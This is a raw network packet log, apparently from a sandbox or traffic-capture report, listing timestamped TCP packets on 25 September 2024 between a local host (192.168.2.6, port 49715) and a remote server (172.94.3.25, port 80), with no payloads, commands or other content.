Sep 25, 2024 16:03:46.694272995 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:46.694286108 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:46.694359064 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:46.695008993 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:46.695050001 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:46.695144892 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:46.695173025 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:46.695193052 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:46.695203066 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:46.695204020 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:46.695215940 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:46.695228100 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:46.695239067 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:46.695245981 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:46.695250034 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:46.695256948 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:46.695264101 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:46.695274115 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:46.695277929 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:46.695287943 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:46.695297003 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:46.695306063 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:46.695307970 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:46.695319891 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:46.695333004 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:46.695358992 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:46.705310106 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:46.705322027 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:46.705390930 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:46.771373034 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:46.771398067 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:46.771421909 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:46.771433115 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:46.771445036 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:46.771500111 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:46.771502018 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:46.771511078 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:46.771558046 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:46.771603107 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:46.771615028 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:46.771626949 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:46.771634102 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:46.771662951 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:46.771783113 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:46.771806002 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:46.771816969 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:46.771837950 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:46.771971941 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:46.771992922 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:46.772006035 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:46.772015095 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:46.772046089 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:46.772059917 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:46.772156000 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:46.772178888 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:46.772185087 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:46.772191048 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:46.772221088 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:46.849602938 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:46.849631071 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:46.849644899 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:46.849657059 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:46.849670887 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:46.849672079 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:46.849680901 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:46.849694967 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:46.849703074 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:46.849708080 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:46.849720955 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:46.849733114 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:46.849756002 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:46.849756002 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:46.849788904 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:46.849951982 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:46.849965096 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:46.849977970 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:46.850200891 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:46.850246906 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:46.850259066 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:46.850270987 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:46.850280046 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:46.850302935 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:46.850305080 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:46.850316048 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:46.850327969 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:46.850362062 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:46.927424908 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:46.927445889 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:46.927457094 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:46.927463055 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:46.927484035 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:46.927495003 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:46.927505970 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:46.927520037 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:46.927578926 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:46.927588940 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:46.927602053 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:46.927613974 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:46.927649975 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:46.927953959 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:46.927966118 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:46.927977085 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:46.928008080 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:46.928030968 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:46.928164005 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:46.928225994 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:46.928239107 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:46.928282022 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:46.928306103 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:46.928344011 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:46.937896967 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:46.937910080 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:46.938029051 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:47.005850077 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.005872011 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.005891085 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.005903006 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.005914927 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.005953074 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:47.006001949 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.006038904 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:47.006045103 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.006055117 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.006074905 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.006083965 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:47.006088018 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.006122112 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:47.006158113 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.006169081 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.006180048 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.006192923 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.006201029 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:47.006223917 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.006226063 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:47.006270885 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.006283045 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.006299973 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:47.016073942 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.016092062 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.016169071 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:47.084079981 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.084117889 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.084130049 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.084147930 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.084168911 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.084182024 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.084192991 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:47.084203005 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.084214926 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.084228992 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.084239960 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.084244967 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:47.084252119 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.084264994 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.084270954 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:47.084304094 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:47.084682941 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.084703922 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.084717035 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.084727049 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.084739923 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:47.084742069 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.084753990 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.084769011 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:47.084788084 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:47.084872007 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.084925890 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.084939003 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.084961891 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:47.141115904 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:47.162226915 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.162245035 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.162259102 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.162286997 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:47.162518024 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.162529945 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.162543058 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.162550926 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:47.162556887 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.162581921 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:47.162620068 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.162632942 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.162647009 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.162657976 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:47.162681103 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:47.162743092 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.162769079 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.162781000 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.162792921 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.162803888 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:47.162805080 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.162828922 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:47.162904978 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.162928104 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.162940979 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.162947893 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:47.162954092 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.162986040 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:47.240531921 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.240552902 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.240576029 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.240590096 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.240600109 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.240612984 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.240629911 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.240643978 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.240652084 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:47.240693092 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:47.240957975 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.240971088 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.240998030 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.241019964 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:47.241063118 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.241075993 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.241089106 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.241099119 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:47.241101027 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.241116047 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.241126060 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:47.241153002 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:47.250775099 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.250792027 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.250880003 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:47.320103884 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.320121050 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.320133924 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.320255041 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.320274115 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.320280075 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.320283890 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:47.320285082 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.320291042 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.320297956 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.320305109 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.320312977 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.320313931 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.320316076 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.320328951 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.320342064 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:47.320373058 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.320375919 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:47.320384026 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.320395947 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.320415020 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:47.374324083 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:47.398176908 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.398195028 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.398216963 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.398227930 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.398241043 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.398252010 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.398364067 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.398399115 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:47.398421049 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.398432016 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.398452044 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.398463964 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.398471117 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:47.398473978 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.398504019 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:47.398519039 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:47.398555994 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.398565054 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.398602962 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:47.398621082 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.398668051 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.398678064 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.398710012 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:47.398736954 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.398746967 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.398771048 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:47.408562899 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.408580065 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.408643961 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:47.452436924 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:47.476452112 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.476489067 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.476569891 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.476578951 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:47.476583004 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.476594925 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.476625919 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:47.476655006 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.476694107 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:47.476728916 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.476747990 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.476762056 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.476773977 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.476783991 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:47.476814032 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:47.476977110 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.477068901 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.477082014 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.477094889 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.477106094 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.477107048 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:47.477125883 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:47.486764908 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.486829042 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:47.486963987 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.530653000 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:47.554657936 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.554675102 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.554686069 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.554698944 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.554713011 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.554778099 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:47.554814100 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:47.554987907 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.555011034 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.555021048 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.555026054 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:47.555053949 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:47.555078983 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.555089951 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.555129051 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:47.555149078 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.555159092 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.555171013 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.555186033 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:47.555341005 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.555357933 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.555370092 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.555371046 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:47.555398941 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.555399895 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:47.555412054 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.555423021 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.555433989 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.555440903 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:47.555459976 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:47.632824898 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:47.632841110 CEST	80	49715	172.94.3.25	192.168.2.6
